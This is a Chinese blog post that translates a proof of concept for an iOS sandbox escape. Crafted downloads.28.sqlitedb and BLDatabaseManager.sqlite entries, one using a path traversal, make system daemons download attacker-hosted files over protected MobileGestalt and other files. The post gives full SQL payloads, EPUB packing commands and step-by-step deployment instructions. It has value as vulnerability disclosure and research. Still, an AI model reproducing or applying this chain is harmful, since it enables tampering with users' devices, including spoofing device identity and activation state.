iOS26.1概念验证 (POC)

最新推荐文章于 2025-11-21 21:51:16 发布
翻译 最新推荐文章于 2025-11-21 21:51:16 发布 · 103 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://hanakim3945.github.io/posts/download28_sbx_escape/
文章标签:

#ios

概念验证 (POC)

恶意精心构造的 downloads.28.sqlitedb 数据库可以修改数据分区 (/private/var/) 上的文件,甚至可以修改通常不允许修改的系统偏好设置和缓存。

设备兼容性
该 POC 适用于运行 iOS 26.2b1 或更早版本的任何 iPhone 和 iPad。

在我们的测试案例中,我们使用一台运行 iOS 26.0.1 的 iPhone 12。我们将把一个修补后的文件写入 /private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist,这将激活设备并将其设备类型设置为 iPod9,1 (iPod touch 7),以演示漏洞利用成功。

文件要求
为了利用此 POC,我们需要满足以下几个要求:

  • 恶意的 downloads.28.sqlitedb 数据库 (阶段1)
  • 恶意的 BLDatabaseManager.sqlite 数据库 (阶段2)
  • 我们想要写入的目标文件,打包成 epub 格式。
  • 用于托管以下文件的服务端:
    • BLDatabaseManager.sqlite
    • iTunesMetadata.plist
    • 我们想要写入的目标文件。这可以是设备数据分区中由 mobile 用户拥有的任何文件。

预期结果
下载任务应因未经授权的目标路径而停止。

实际结果
文件写入被允许,除非目标路径由 root 控制,否则写入将失败。但是,使用此 POC 可以写入大多数由 mobile 用户拥有的文件和路径。

可写文件路径示例

  • /private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/[...]
  • /private/var/mobile/Library/FairPlay/[...]
  • /private/var/mobile/Media/[...]
  • /var/mobile/[...]
  • 更多 …

阶段1 - downloads.28.sqlitedb

在我们的 downloads.28 数据库中,我们找到了几个表——特别值得关注的是 asset 表,它可以下载文件到文件系统中的各种路径。

它由 itunesstored 守护进程管理,因此我们受限于此守护进程的沙盒权限。

例如,它不能写入 /private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist

但它可以写入我们的阶段2数据库位置:

/private/var/containers/Shared/SystemGroup/<某个_UUID_这里>/Documents/BLDatabaseManager/BLDatabaseManager.sqlite

为了将文件下载到上述路径,我们只需要在我们的 downloads.28 数据库中添加一个新条目。以下 SQL 命令可以完成此任务:

INSERT INTO "main"."asset" ("pid", "download_id", "asset_order", "asset_type", "bytes_total", "url", "local_path", "destination_url", "path_extension", "retry_count", "http_method", "initial_odr_size", "is_discretionary", "is_downloaded", "is_drm_free", "is_external", "is_hls", "is_local_cache_server", "is_zip_streamable", "processing_types", "video_dimensions", "timeout_interval", "store_flavor", "download_token", "blocked_reason", "avfoundation_blocked", "service_type", "protection_type", "store_download_key", "etag", "bytes_to_hash", "hash_type", "server_guid", "file_protection", "variant_id", "hash_array", "http_headers", "request_parameters", "body_data", "body_data_file_path", "sinfs_data", "dpinfo_data", "uncompressed_size", "url_session_task_id") VALUES (1234567890, 6936249076851270150, 0, 'media', NULL, 'https://<URL域名>/fileprovider.php?type=sqlite', '/private/var/containers/Shared/SystemGroup/0DAF9578-C293-4C5D-9CF4-21E78AE8E372/Documents/BLDatabaseManager/BLDatabaseManager.sqlite', NULL, 'epub', 6, 'GET', NULL, 0, 0, 0, 1, 0, 0, 0, 0, NULL, 60, NULL, 466440000, 0, 0, 0, 0, '', NULL, NULL, 0, NULL, NULL, NULL, X'62706c6973743030a1015f10203661383338316461303164646263393339653733643131303036326266633566080a000000000000010100000000000000020000000000000000000000000000002d', NULL, NULL, NULL, NULL, NULL, NULL, 0, 1);

阶段2 - BLDatabaseManager.sqlite

此数据库由 bookassetd 管理,这是另一个负责在我们的 iDevice 上下载和管理 iBooks 的守护进程。它的沙盒权限更广,可以写入数据分区中大多数由 mobile 用户拥有的文件。

在我们的案例中,我们将把一个文件写入 /var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist

为了将文件下载到那里,我们进入 BLDatabaseManager.sqlite 数据库,并向 ZBDOWNLOADINFO 表添加以下行:

INSERT INTO "ZBLDOWNLOADINFO" ("Z_PK", "Z_ENT", "Z_OPT", "ZACCOUNTIDENTIFIER", "ZCLEANUPPENDING", "ZFAMILYACCOUNTIDENTIFIER", "ZISAUTOMATICDOWNLOAD", "ZISLOCALCACHESERVER", "ZISPURCHASE", "ZISRESTORE", "ZISSAMPLE", "ZISZIPSTREAMABLE", "ZNUMBEROFBYTESTOHASH", "ZPERSISTENTIDENTIFIER", "ZPUBLICATIONVERSION", "ZSERVERNUMBEROFBYTESTOHASH", "ZSIZE", "ZSTATE", "ZSTOREIDENTIFIER", "ZSTOREPLAYLISTIDENTIFIER", "ZLASTSTATECHANGETIME", "ZPURCHASEDATE", "ZSTARTTIME", "ZARTISTNAME", "ZARTWORKPATH", "ZASSETPATH", "ZBUYPARAMETERS", "ZCANCELDOWNLOADURL", "ZCLIENTIDENTIFIER", "ZCOLLECTIONARTISTNAME", "ZCOLLECTIONTITLE", "ZDOWNLOADID", "ZDOWNLOADKEY", "ZENCRYPTIONKEY", "ZEPUBRIGHTSPATH", "ZFILEEXTENSION", "ZGENRE", "ZHASHTYPE", "ZKIND", "ZMD5HASHSTRINGS", "ZORIGINALURL", "ZPERMLINK", "ZPLISTPATH", "ZSALT", "ZSUBTITLE", "ZTHUMBNAILIMAGEURL", "ZTITLE", "ZTRANSACTIONIDENTIFIER", "ZURL", "ZRACGUID", "ZDPINFO", "ZSINFDATA", "ZFILEATTRIBUTES") VALUES
('1', '2', '3', '0', '0', '0', '0', '', NULL, NULL, NULL, NULL, '0', '0', '0', NULL, '4648', '2', '765107108', NULL, '767991550.119197', NULL, '767991353.245275', NULL, NULL, '/private/var/mobile/Media/Books/asset.epub', 'productType=PUB&price=0&salableAdamId=765107106&pricingParameters=PLUS&pg=default&mtApp=com.apple.iBooks&mtEventTime=1746298553233&mtOsVersion=18.4.1&mtPageId=SearchIncrementalTopResults&mtPageType=Search&mtPageContext=search&mtTopic=xp_amp_bookstore&mtRequestId=35276ff6-5c8b-4136-894e-b6d8fc7677b3', 'https://p19-buy.itunes.apple.com/WebObjects/MZFastFinance.woa/wa/songDownloadDone?download-id=J19N_PUB_190099164604738&cancel=1', '4GG2695MJK.com.apple.iBooks', 'Sebastian Saenz', 'Cartas de Amor a la Luna', '../../../../../../private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library', NULL, NULL, NULL, NULL, 'Contemporary Romance', NULL, 'ebook', NULL, NULL, NULL, '/private/var/mobile/Media/Books/iTunesMetadata.plist', NULL, 'Cartas de Amor a la Luna', 'https://<URL域名>/fileprovider.php?type=gestalt', 'Cartas de Amor a la Luna', 'J19N_PUB_190099164604738', 'https://<URL域名>/fileprovider.php?type=gestalt2', NULL, NULL, NULL, NULL);

目标文件 - EPUB 格式

为了成功写入文件,文件需要具有正确的格式。

通常的结构如下所示:

mybook/
├── mimetype
├── META-INF/
│   └── container.xml
└── OEBPS/
    ├── content.opf
    ├── nav.xhtml
    └── chapter1.xhtml

在我们的案例中,我们稍微修改了一下结构,如下所示:

Caches/
├── mimetype
└── com.apple.MobileGestalt.plist

在压缩此结构时,我们需要确保 mimetype 文件不被压缩。

我们可以这样做:

zip -X0 hax.epub Caches/mimetype
zip -Xr9D hax.epub Caches/com.apple.MobileGestalt.plist

生成的文件已准备就绪,可以放在服务器上,以便通过 BLDatabaseManager 下载到目标路径。

漏洞利用过程

  1. 启动设备,连接到具有互联网访问权限的稳定 WiFi 网络。
  2. 修改 downloads.28.sqlitedb 数据库,使其包含指向 BLDatabaseManager 的正确路径。我们需要在此处找到路径的正确 UUID。这可以通过使用命令 pymobiledevice3 syslog collect logs.logarchive 获取设备日志存档来实现。生成的文件可以在 Mac 的 Console.app 中打开,我们可以通过搜索 “BLDatabase” 轻松找到路径。例如:info 2025-10-20 22:43:29.111433 +0200 bookassetd [Database]: Store is at file:///private/var/containers/Shared/SystemGroup/<UUID_这里>/Documents/BLDatabaseManager/BLDatabaseManager.sqlite。找到后,用正确的路径替换数据库中的路径。
  3. 首先,删除文件夹 /var/mobile/Media/Downloads 中的所有文件。
  4. 将精心构造的 downloads.28.sqlitedb 放入 /var/mobile/Media/Downloads/downloads.28.sqlitedb。这可以通过任何 Apple File Conduit (afc) 客户端完成,例如 3uTools、i4.cn 或使用 afcclient 命令行工具 (https://github.com/emonti/afcclient/tree/master)。
  5. 重启设备。重启后,/var/mobile/Media/iTunes_Control/iTunes/iTunesMetadata.plist 处应该会出现一个文件,这表明第一阶段奏效了。
  6. 将此 /var/mobile/Media/iTunes_Control/iTunes/iTunesMetadata.plist 复制到 /var/mobile/Media/Books/iTunesMetadata.plist
  7. 再次重启。重启后,文件夹 /var/mobile/Media/Books/ 中应该会出现一些新文件 (asset.epub)。文件 /var/mobile/Media/Books/iTunesMetadata.plist 应该会消失,只需再次添加它。
  8. 再次重启
  9. 修改应该已成功写入。
DeepHacking
关注
选型测试.概念验证PoC(Proof of Concept)
助力开发者进阶为高效技术管理者,记录沉淀打造可复用的工程方法论体系
10-25 5500
PoC(Proof of Concept),即概念验证。通常是企业进行产品选型时或开展外部实施项目前,进行的一种产品或供应商能力验证工作。
fofa批量验证poc脚本笔记
mingyqf的博客
04-27 1132
结合fofa爬取ip段, 再进行 批量的poc 验证 本文为学习笔记,侵删 文章目录结合fofa爬取ip段, 再进行 批量的poc 验证详细解释参考文章:代码: 详细解释参考文章: https://wenku.baidu.com/view/4c8c5fa2ef3a87c24028915f804d2b160b4e86f8.html 代码: 代码来源:https://chiza.gitee.io/2022/02/28/%E8%AE%B0%E4%B8%80%E6%AC%A1edusrc%E7%9A%84%E6.
iOS9企业部署分发问题深入了解与解决
weixin_34034670的博客
11-18 315
1. iOS9以后,企业级分发ipa包将遭到与Mac上dmg安装包一样的待遇:默认不能安装,也不再出现“信任按钮”解决办法2. iOS9以后,企业分发时可能存在:下载的ipa包与网页两者的 bundle ID 无法匹配而导致下载失败的情况解决办法 ※本文主要针对问题二进行问题的深入了解与解决。 我们都知道iOS8企业分发有个bug,就是当因...
电脑上如何打开sqlitedb格式的文件?
热门推荐
随笔记录-分享&记忆
08-29 1万+
1,从iphone上获取sms.db 2,下载 sqlite browser windows 版本浏览器。 (我已经上传到资源里) 3,下载 msvcr71.dll (我已经上传到资源里) 4,把上面两个文件解压缩到同一个文件夹,执行SQLite Database Brow
如何进行POC概念验证
zhglhy的专栏
12-25 1755
确定 POC 的成功标准。:基于 POC 结果,建议是否继续开发、调整方案或放弃。:POC 不是最终产品,范围应尽量小,专注于核心功能。:选择验证方法,例如原型开发、模拟测试或数据分析。:明确衡量成功的指标,例如性能、准确性或用户体验。:向团队展示 POC 结果,并建议进一步优化模型。:开发一个简单的预测模型,并在测试数据集上运行。:不要试图解决所有问题,专注于验证最关键的部分。:POC 的目的是快速验证,避免过度开发。:明确你要解决的核心问题或验证的关键点。:判断概念是否可行,是否需要调整或放弃。
POC---概念验证
qq_42700796的博客
07-06 7933
1、产品的功能。产品功能由企业提供,企业可以根据自己的需求提供功能清单,也可以通过与多家供应商交流后,列出自己所需要的功能;2、产品的性能。性能指标也是由企业提供,并建议提供具体性能指标所应用的环境及硬件设备等测试环境要求;3、产品的API适用性;4、产品相关技术文档的规范性、完整性;5、涉及到自定义功能研发的,还需验证API开放性,供应商实施能力;6、企业资质规模及企业实施案例等。1、前期调研充分,并已经对产品或供应商有了较深入的沟通了解;2、企业对自己的产品需求比较清晰。使用用户代表、业务负责人、项目负
概念验证PoC)
Terry的博客
03-08 1万+
概念验证(英语:Proof of concept,简称POC)是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。 实施人工智能概念验证的 5 大步骤 淺論架構的 POC (Proof of Concepts)概念设计到信息架构 从需求到原型,揭秘概念设计过程(一) ...
软件部署中概念验证POC)的全面解析
Flying_Fish_roe的博客
07-09 1121
POC已从单纯的“技术验证”演进为**企业数字化转型的核心决策工具**。随着Serverless架构普及,未来POC焦点将转向: - **冷启动耗时**(如AWS Lambda从触发到响应≤800ms) - **跨云编排能力**(多云工作流引擎兼容性) - **碳足迹审计**(每万次API调用的能耗比) > 正如Gartner预测:**到2027年,未通过深度POC的软件采购项目失败率将高达45%**,而采用自动化POC平台的企业可将投产周期压缩60%。
工程实践 — POC验证测试概念
hafo2020的博客
06-27 2009
POC(Proof of Concept),即概念验证。通常是企业进行产品选型时或开展外部实施项目前,进行的一种产品或供应商能力验证工作。 是业界流行的针对客户具体应用的验证性测试,根据用户对采用系统提出的性能要求和扩展需求的指标,在选用服务器上进行真实数据的运行,对承载用户数据量和运行时间进行实际测算,并根据用户未来业务扩展的需求加大数据量以验证系统和平台的承载能力和性能变化。(百度百科) 验证内容: 产品的功能。产品功能由企业提供,企业可以根据自己的需求提供功能清单,也可以通过与多家供应商交流后,
poc:概念验证项目的存储库
06-14
&quot;poc:概念验证项目的存储库&quot; 是一个与软件开发相关的项目,主要集中在验证特定技术概念或漏洞利用方法。在IT行业中,Proof of Concept(PoC)通常指的是开发者创建的一个小型可运行示例,用于证明某种理论、概念...
中国联通总部信息化软件POC验证测试管理规范_POC测试_
10-03
POC(Proof of Concept)测试,也称为概念验证测试,是软件选型过程中的一个重要环节。在这个阶段,潜在的供应商或解决方案会被要求在实际环境中演示其功能、性能和兼容性,以证明它们能够满足用户的具体需求和期望...
apache solr ssrf漏洞验证poc CVE-2021-27905
03-31
apache solr ssrf漏洞验证poc CVE-2021-27905
wildfly-poc:WildFly 概念验证
07-16
【标题】:WildFly 概念验证 在IT行业中,WildFly是一款开源的应用服务器,它以前被称为JBoss AS,由Red Hat公司维护。这个&ldquo;wildfly-poc&rdquo;项目显然是一个针对WildFly的功能验证或者概念证明(Proof of Concept,...
iOS 如何自定义第一个显示的视图(含 SceneDelegate 删除指南)
weixin_39339407的博客
11-20 1109
本文介绍了如何在iOS项目中自定义启动页面的设置方法。主要内容包括:1)移除默认的ViewController根视图;2)在AppDelegate中手动设置window和rootViewController的传统方法;3)iOS13引入SceneDelegate后如何调整设置;4)针对仅需单窗口的iPhone应用,详细说明了完全移除SceneDelegate的步骤(删除文件及Info.plist配置)。文章强调无论采用哪种架构,关键是要明确首页等于window.rootViewController,并指出了
iOS Swift MVVM + RxSwift Generic Rules
weixin_43848765的博客
11-21 1064
【代码】iOS Swift MVVM + RxSwift Generic Rules。
iOS 如何全局修改项目字体
weixin_39339407的博客
11-19 730
iOS设备在宽屏上字体&quot;变小&quot;其实是视觉错觉,因为屏幕变宽后布局空间增大,导致文字视觉占比下降。实际字体逻辑尺寸(pt)未变,Retina屏只是用更多像素(px)使文字更清晰。文章分析了iOS字体渲染原理(pt与px的区别),并提供了多种全局适配方案:1) Hook方法(不推荐);2) Objective-C宏定义;3) Swift字体Helper;4) SwiftUI ViewModifier。建议根据项目技术栈选择合适方案,在保证视觉一致性的同时维护代码质量,实现科学合理的字体适配。
开源 Objective-C IOS 应用开发(二十)多线程处理
ajassi2000的博客
11-20 818
本文记录了一个嵌入式开发者临时转岗iOS应用开发的学习过程,重点介绍了Objective-C中的多线程处理实现。通过CustomViewController类展示了NSThread线程的创建、停止和通信机制,并详细演示了GCD的各种使用场景,包括串行队列、并发队列、主队列和任务组。文中提供了完整的UI交互实现,包含状态显示、控制按钮和详细日志功能,确保线程操作安全性和UI更新的正确性。该案例可作为iOS多线程开发的实用参考,特别适合具有嵌入式背景的开发者快速上手Objective-C应用开发。
flutter开发iOS、Android、Harmony
weixin_37543822的博客
11-19 254
下载之后添加到fvm的versions文件夹中,fvm list 检测是否添加成功,注意fvm命令有时需要翻墙。通过代码工具下载仓库代码并指定dev或master分支,dev不断在更新相比master拥有更多功能。flutter项目开发跨平台支持iOS、安卓,现在也可以支持华为鸿蒙系统,如何在不同平台之间切换。开发iOS和安卓平台是可以使用flutter 的SDK,开发鸿蒙时需要切换到鸿蒙版的SDK。安装 Android Studio。二、安装FVM 管理flutter。安装DevEco Studio。
iOS--Runtime
最新发布
2301_79929304的博客
11-21 695
本文介绍了iOS中Runtime的概念、相关的数据结构、消息动态派发机制以及在Swift中的应用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值